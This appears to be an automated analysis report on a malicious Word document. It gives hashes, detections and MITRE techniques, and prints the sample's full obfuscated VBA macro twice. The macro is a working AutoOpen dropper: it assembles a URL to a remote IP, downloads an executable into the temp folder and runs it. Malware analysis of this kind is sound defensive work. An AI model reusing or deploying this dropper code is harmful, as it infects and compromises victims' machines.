Office (OLE) malware analysis — malicious · 38193dbbd31cd07d

MALICIOUS

Office (OLE)

64.0 KB Created: 2016-08-16 04:07:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: b0d884351fe4e785900bc817ce0394a3 SHA-1: 0eabf1b820d63bf7b82e1eb020d0fd302bad861f SHA-256: 38193dbbd31cd07d689fccf4f9be88de1320dd6c4d4457e9347ba6c0b229835b

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample contains VBA macros that are configured to execute automatically upon opening, as indicated by the AutoOpen marker and the critical OLE_VBA_SHELL and OLE_VBA_HTTP_DROP_EXEC heuristics. The script likely downloads and executes a second-stage payload from a remote source, a common technique for malware droppers. The ClamAV detection further supports the malicious nature of the file.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6459992-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6459992-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (mosvellotv5)
```
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
Matched line in script
```
afuqe.write cjefliwba.responseBody
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set cjefliwba = CreateObject(awvewo)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6538 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6538 bytes
SHA-256: `fba2ab5295acf474016a0f39076aabc21cedd719fed09a9ff59786f4afc9773a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ipdeqfo() Dim kdavida kdavida = "yp" ipdeqfo = kdavida End Function Function sbeldezno() Dim parfo parfo = "Sc" sbeldezno = parfo End Function Function edahaxi() Dim mfycera mfycera = "T" edahaxi = mfycera End Function Function yluktokc() Dim ixixu ixixu = Array("9/", "zkup", "igivc", "tra", "eszynp", "hsog", "ih", "idf")(0) yluktokc = ixixu End Function Function pajexv() Dim edsuxnuhha edsuxnuhha = "TT" pajexv = edsuxnuhha End Function Function oguk() Dim umysaspe umysaspe = "91" oguk = umysaspe End Function Function obyvix() Dim uwytwu uwytwu = "Ad" obyvix = uwytwu End Function Function ldicqoqt() Dim amuge amuge = Array("b.", "uzo", "idmuz", "bdo", "asukz", "qega")(0) ldicqoqt = amuge End Function Function inofwy() Dim ujzyvwevru ujzyvwevru = Array("mqo", "ocb", "erhyqt", "gezpu", "os", "edukj")(4) inofwy = ujzyvwevru End Function Function uqqavmygy() Dim ejwenin ejwenin = Array("cr", "ererm", "aw", "eb", "pu", "ehx", "ejwep")(0) uqqavmygy = ejwenin End Function Function yruzw() Dim haqyzc haqyzc = Array("nihxu", "ogv", "ikj", "to", "ri", "ebwo")(4) yruzw = haqyzc End Function Function ojqugoxu() Dim zetesli zetesli = "g." ojqugoxu = zetesli End Function Function obixker() Dim tezi tezi = Array("avly", "wby", "juvre", "ecid", "le", "gni")(4) obixker = tezi End Function Function ynikhyby() Dim ujylmus ujylmus = Array("waz", "rhel", "te", "lili", "kzu", "elcacp", "bymqo")(2) ynikhyby = ujylmus End Function Function faraxbev() Dim acemk acemk = "Mi" faraxbev = acemk End Function Function ypzopigm() Dim efopuqb efopuqb = Array("cpy", "elpu", "nvofko", "d.", "qom", "ampurd", "uwjef", "erybm")(3) ypzopigm = efopuqb End Function Function idodosdi() Dim fisamro fisamro = Array("rec", "ode", "qcaf", "omq", "axbogs", "em", "gjat")(5) idodosdi = fisamro End Function Function awyljust() Dim ixujcub ixujcub = "je" awyljust = ixujcub End Function Function usivlold() Dim axqaw axqaw = "ct" usivlold = axqaw End Function Function cnyztafk() Dim genlelqi genlelqi = "cr" cnyztafk = genlelqi End Function Function xbani() Dim dtuqenu dtuqenu = "od" xbani = dtuqenu End Function Function oprarte() Dim whyvoxsy whyvoxsy = Array("in", "epnoq", "acy", "bila", "sdeh", "izz")(0) oprarte = whyvoxsy End Function Function fxehlalhud() Dim nzuvo nzuvo = "of" fxehlalhud = nzuvo End Function Function emigze() Dim ojmykhij ojmykhij = Array("ory", "fopq", "efy", "llafy", "XM", "pnu")(4) emigze = ojmykhij End Function Function atgojtok() Dim omkinhad omkinhad = Array("ysa", "osag", "ochasv", "urv", "Sy", "yk")(4) atgojtok = omkinhad End Function Function himkek() Dim yxelmyri yxelmyri = "ex" himkek = yxelmyri End Function Function lysqobp() Dim lotkyw lotkyw = "3." lysqobp = lotkyw End Function Function vizim() Dim eqajtosl eqajtosl = Array("en", "by", "nukny", "udg", "iwrulz", "umofs")(0) vizim = eqajtosl End Function Function ywuwk() Dim xoxmybhi xoxmybhi = Array("zra", ".4", "zasl", "vze", "agtoq", "tqusa")(1) ywuwk = xoxmybhi End Function Function agebi() Dim oguwra oguwra = "4." agebi = oguwra End Function Function axenb() Dim ozowj ozowj = ":/" axenb = ozowj End Function Function pumavbod() Dim civifutf civifutf = "am" pumavbod = civifutf End Function Function xaholy() Dim yzeri yzeri = "P" xaholy = yzeri End Function Function jrocoqson() Dim yxjevy yxjevy = "Ob" jrocoqson = yxjevy End Function Function nocmesnagt() Dim mgaqy mgaqy = Array("esi", "zif", "uxry", "tvef", "LH", "lryki", "utxah")(4) nocmesnagt = mgaqy End Function Function cdabeg() Dim esgaz esgaz = "ht" cdabeg = esgaz End Function Function ymudjy() Dim itmydodwe itmydodwe = "Fi" ymudjy = itmydodwe End Function Function xetumpat() Dim ofin ofin = Array("lo", "as", "vi", "dvec", "udkeqf", "pt", "uj")(5) xetumpat = ofin End Function Function spihkokqow() Dim vxapmampon vxapmampon = Array("tp", "lupt", "ig", "syz", "qzuxi", "thebxe", "og", "wy")(0) spihkokqow = vxapmampon End Function Function dixno() Dim evaffa evaffa = Array("ypeq", "17", "ixa", "mvamru", "sjaha", "fbihta")(1) dixno = evaffa End Function Function ymdagj() Dim wvelofi wvelofi = "re" ymdagj = wvelofi End Function Function luwi() Dim hzombyzt hzombyzt = Array("radi", "oh", "GE", "ta", "yrol", "yqv", "szob")(2) luwi = hzombyzt End Function Function iwqylfe() Dim zypig zypig = "st" iwqylfe = zypig End Function Function aqykbo() Dim bruzidqu bruzidqu = "t." aqykbo = bruzidqu End Function Function amgynp() Dim trujocx trujocx = "St" amgynp = trujocx End Function Function erfidn() Dim obylo obylo = Array("e", "vezi", "tzyv", "yhr", "vlysc", "cu")(0) erfidn = obylo End Function Function hsykxy() Dim sfekmixlepl sfekmixlepl = Array("ewu", "/9", "egop", "bof", "qo", "xa", "ifakm", "darno")(1) hsykxy = sfekmixlepl End Function Function camla() Dim waxre waxre = 1 camla = waxre End Function Function awkivme() Dim ijizybz ijizybz = 2 awkivme = ijizybz End Function Function dusakj() Dim seslawt seslawt = 2 dusakj = seslawt End Function Sub AutoOpen() Dim didke, urgos7, runcugzy5, ovsyx0 Dim awvewo runcugzy5 = luwi & edahaxi awvewo = faraxbev & uqqavmygy & inofwy & fxehlalhud & aqykbo & emigze & nocmesnagt & pajexv & xaholy didke = sbeldezno & yruzw & xetumpat & oprarte & ojqugoxu & ymudjy & obixker & atgojtok & iwqylfe & idodosdi & jrocoqson & awyljust & usivlold ovsyx0 = cdabeg & spihkokqow & axenb & hsykxy & lysqobp & dixno & agebi & oguk & ywuwk & yluktokc & vizim & cnyztafk & ipdeqfo & ynikhyby & ypzopigm & himkek & erfidn urgos7 = obyvix & xbani & ldicqoqt & amgynp & ymdagj & pumavbod Dim mosvellotv5 Dim ufenyqv Set cjefliwba = CreateObject(awvewo) Set pzidtuqgem9 = CreateObject(didke) Set mtufju = pzidtuqgem9.GetSpecialFolder(dusakj) Set afuqe = CreateObject(urgos7) ufenyqv = pzidtuqgem9.GetTempName() delimit = "\" mosvellotv5 = mtufju & delimit & ufenyqv resso = runcugzy5 cjefliwba.Open resso, ovsyx0, False cjefliwba.Send afuqe.Type = camla afuqe.Open afuqe.write cjefliwba.responseBody afuqe.savetofile mosvellotv5, dusakj Shell (mosvellotv5) End Sub

SHA-256: fba2ab5295acf474016a0f39076aabc21cedd719fed09a9ff59786f4afc9773a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ipdeqfo()
Dim kdavida
kdavida = "yp"
ipdeqfo = kdavida
End Function
Function sbeldezno()
Dim parfo
parfo = "Sc"
sbeldezno = parfo
End Function
Function edahaxi()
Dim mfycera
mfycera = "T"
edahaxi = mfycera
End Function
Function yluktokc()
Dim ixixu
ixixu = Array("9/", "zkup", "igivc", "tra", "eszynp", "hsog", "ih", "idf")(0)
yluktokc = ixixu
End Function
Function pajexv()
Dim edsuxnuhha
edsuxnuhha = "TT"
pajexv = edsuxnuhha
End Function
Function oguk()
Dim umysaspe
umysaspe = "91"
oguk = umysaspe
End Function
Function obyvix()
Dim uwytwu
uwytwu = "Ad"
obyvix = uwytwu
End Function
Function ldicqoqt()
Dim amuge
amuge = Array("b.", "uzo", "idmuz", "bdo", "asukz", "qega")(0)
ldicqoqt = amuge
End Function
Function inofwy()
Dim ujzyvwevru
ujzyvwevru = Array("mqo", "ocb", "erhyqt", "gezpu", "os", "edukj")(4)
inofwy = ujzyvwevru
End Function
Function uqqavmygy()
Dim ejwenin
ejwenin = Array("cr", "ererm", "aw", "eb", "pu", "ehx", "ejwep")(0)
uqqavmygy = ejwenin
End Function
Function yruzw()
Dim haqyzc
haqyzc = Array("nihxu", "ogv", "ikj", "to", "ri", "ebwo")(4)
yruzw = haqyzc
End Function
Function ojqugoxu()
Dim zetesli
zetesli = "g."
ojqugoxu = zetesli
End Function
Function obixker()
Dim tezi
tezi = Array("avly", "wby", "juvre", "ecid", "le", "gni")(4)
obixker = tezi
End Function
Function ynikhyby()
Dim ujylmus
ujylmus = Array("waz", "rhel", "te", "lili", "kzu", "elcacp", "bymqo")(2)
ynikhyby = ujylmus
End Function
Function faraxbev()
Dim acemk
acemk = "Mi"
faraxbev = acemk
End Function
Function ypzopigm()
Dim efopuqb
efopuqb = Array("cpy", "elpu", "nvofko", "d.", "qom", "ampurd", "uwjef", "erybm")(3)
ypzopigm = efopuqb
End Function
Function idodosdi()
Dim fisamro
fisamro = Array("rec", "ode", "qcaf", "omq", "axbogs", "em", "gjat")(5)
idodosdi = fisamro
End Function
Function awyljust()
Dim ixujcub
ixujcub = "je"
awyljust = ixujcub
End Function
Function usivlold()
Dim axqaw
axqaw = "ct"
usivlold = axqaw
End Function
Function cnyztafk()
Dim genlelqi
genlelqi = "cr"
cnyztafk = genlelqi
End Function
Function xbani()
Dim dtuqenu
dtuqenu = "od"
xbani = dtuqenu
End Function
Function oprarte()
Dim whyvoxsy
whyvoxsy = Array("in", "epnoq", "acy", "bila", "sdeh", "izz")(0)
oprarte = whyvoxsy
End Function
Function fxehlalhud()
Dim nzuvo
nzuvo = "of"
fxehlalhud = nzuvo
End Function
Function emigze()
Dim ojmykhij
ojmykhij = Array("ory", "fopq", "efy", "llafy", "XM", "pnu")(4)
emigze = ojmykhij
End Function
Function atgojtok()
Dim omkinhad
omkinhad = Array("ysa", "osag", "ochasv", "urv", "Sy", "yk")(4)
atgojtok = omkinhad
End Function
Function himkek()
Dim yxelmyri
yxelmyri = "ex"
himkek = yxelmyri
End Function
Function lysqobp()
Dim lotkyw
lotkyw = "3."
lysqobp = lotkyw
End Function
Function vizim()
Dim eqajtosl
eqajtosl = Array("en", "by", "nukny", "udg", "iwrulz", "umofs")(0)
vizim = eqajtosl
End Function
Function ywuwk()
Dim xoxmybhi
xoxmybhi = Array("zra", ".4", "zasl", "vze", "agtoq", "tqusa")(1)
ywuwk = xoxmybhi
End Function
Function agebi()
Dim oguwra
oguwra = "4."
agebi = oguwra
End Function
Function axenb()
Dim ozowj
ozowj = ":/"
axenb = ozowj
End Function
Function pumavbod()
Dim civifutf
civifutf = "am"
pumavbod = civifutf
End Function
Function xaholy()
Dim yzeri
yzeri = "P"
xaholy = yzeri
End Function
Function jrocoqson()
Dim yxjevy
yxjevy = "Ob"
jrocoqson = yxjevy
End Function
Function nocmesnagt()
Dim mgaqy
mgaqy = Array("esi", "zif", "uxry", "tvef", "LH", "lryki", "utxah")(4)
nocmesnagt = mgaqy
End Function
Function cdabeg()
Dim esgaz
esgaz = "ht"
cdabeg = esgaz
End Function
Function ymudjy()
Dim itmydodwe
itmydodwe = "Fi"
ymudjy = itmydodwe
End Function
Function xetumpat()
Dim ofin
ofin = Array("lo", "as", "vi", "dvec", "udkeqf", "pt", "uj")(5)
xetumpat = ofin
End Function
Function spihkokqow()
Dim vxapmampon
vxapmampon = Array("tp", "lupt", "ig", "syz", "qzuxi", "thebxe", "og", "wy")(0)
spihkokqow = vxapmampon
End Function
Function dixno()
Dim evaffa
evaffa = Array("ypeq", "17", "ixa", "mvamru", "sjaha", "fbihta")(1)
dixno = evaffa
End Function
Function ymdagj()
Dim wvelofi
wvelofi = "re"
ymdagj = wvelofi
End Function
Function luwi()
Dim hzombyzt
hzombyzt = Array("radi", "oh", "GE", "ta", "yrol", "yqv", "szob")(2)
luwi = hzombyzt
End Function
Function iwqylfe()
Dim zypig
zypig = "st"
iwqylfe = zypig
End Function
Function aqykbo()
Dim bruzidqu
bruzidqu = "t."
aqykbo = bruzidqu
End Function
Function amgynp()
Dim trujocx
trujocx = "St"
amgynp = trujocx
End Function
Function erfidn()
Dim obylo
obylo = Array("e", "vezi", "tzyv", "yhr", "vlysc", "cu")(0)
erfidn = obylo
End Function
Function hsykxy()
Dim sfekmixlepl
sfekmixlepl = Array("ewu", "/9", "egop", "bof", "qo", "xa", "ifakm", "darno")(1)
hsykxy = sfekmixlepl
End Function
Function camla()
Dim waxre
waxre = 1
camla = waxre
End Function
Function awkivme()
Dim ijizybz
ijizybz = 2
awkivme = ijizybz
End Function
Function dusakj()
Dim seslawt
seslawt = 2
dusakj = seslawt
End Function

Sub AutoOpen()
Dim didke, urgos7, runcugzy5, ovsyx0
Dim awvewo
runcugzy5 = luwi & edahaxi
awvewo = faraxbev & uqqavmygy & inofwy & fxehlalhud & aqykbo & emigze & nocmesnagt & pajexv & xaholy
didke = sbeldezno & yruzw & xetumpat & oprarte & ojqugoxu & ymudjy & obixker & atgojtok & iwqylfe & idodosdi & jrocoqson & awyljust & usivlold
ovsyx0 = cdabeg & spihkokqow & axenb & hsykxy & lysqobp & dixno & agebi & oguk & ywuwk & yluktokc & vizim & cnyztafk & ipdeqfo & ynikhyby & ypzopigm & himkek & erfidn
urgos7 = obyvix & xbani & ldicqoqt & amgynp & ymdagj & pumavbod
Dim mosvellotv5
Dim ufenyqv

Set cjefliwba = CreateObject(awvewo)
Set pzidtuqgem9 = CreateObject(didke)
Set mtufju = pzidtuqgem9.GetSpecialFolder(dusakj)
Set afuqe = CreateObject(urgos7)

ufenyqv = pzidtuqgem9.GetTempName()
delimit = "\"
mosvellotv5 = mtufju & delimit & ufenyqv
resso = runcugzy5
cjefliwba.Open resso, ovsyx0, False
cjefliwba.Send
afuqe.Type = camla
afuqe.Open
afuqe.write cjefliwba.responseBody
afuqe.savetofile mosvellotv5, dusakj
Shell (mosvellotv5)



End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.